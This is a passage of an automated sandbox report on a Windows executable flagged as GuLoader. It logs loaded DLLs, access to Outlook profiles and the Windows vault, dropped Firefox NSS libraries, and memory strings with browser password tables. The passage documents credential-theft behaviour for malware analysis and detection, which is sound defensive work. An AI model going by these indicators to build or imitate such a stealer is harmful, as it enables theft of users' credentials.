                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                  Source: No. 1349240400713.exe, 00000009.00000003.1863922946.0000000006984000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile read: C:\Users\user\Desktop\No. 1349240400713.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\No. 1349240400713.exe "C:\Users\user\Desktop\No. 1349240400713.exe"
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeProcess created: C:\Users\user\Desktop\No. 1349240400713.exe "C:\Users\user\Desktop\No. 1349240400713.exe"
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeProcess created: C:\Users\user\Desktop\No. 1349240400713.exe "C:\Users\user\Desktop\No. 1349240400713.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: shfolder.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: riched20.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: usp10.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: crtdll.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: mozglue.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: ieframe.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                  Source: No. 1349240400713.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ucrtbase.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1880017638.000000003748C000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1880017638.000000003748C000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: vcruntime140.i386.pdbGCTL source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1880017638.000000003748C000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879220439.00000000378F0000.00000004.00001000.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1880472952.0000000037D14000.00000004.00001000.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1880059026.0000000037488000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1880017638.000000003748C000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: msvcp140.i386.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ucrtbase.pdbUGP source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1880017638.000000003748C000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: vcruntime140.i386.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: msvcp140.i386.pdbGCTL source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Yara detected GuLoader
                  Source: Yara matchFile source: 00000000.00000002.1607296035.0000000003413000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1607100598.0000000000870000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: No. 1349240400713.exe PID: 6412, type: MEMORYSTR
                  Source: api-ms-win-crt-multibyte-l1-1-0.dll.9.drStatic PE information: 0x9F27750A [Wed Aug 12 16:00:10 2054 UTC]
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeCode function: 0_2_6EDF1B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6EDF1B5F
                  Source: System.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x82fd
                  Source: api-ms-win-crt-environment-l1-1-0.dll.9.drStatic PE information: real checksum: 0x10447 should be: 0x13239
                  Source: No. 1349240400713.exeStatic PE information: real checksum: 0x0 should be: 0xb2873
                  Source: msvcp140.dll.9.drStatic PE information: section name: .didat
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\nsy4AC1.tmp\System.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\mozglue.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\vcruntime140.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\ucrtbase.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\softokn3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\nss3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\freebl3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\nssdbm3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\msvcp140.dllJump to dropped file
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
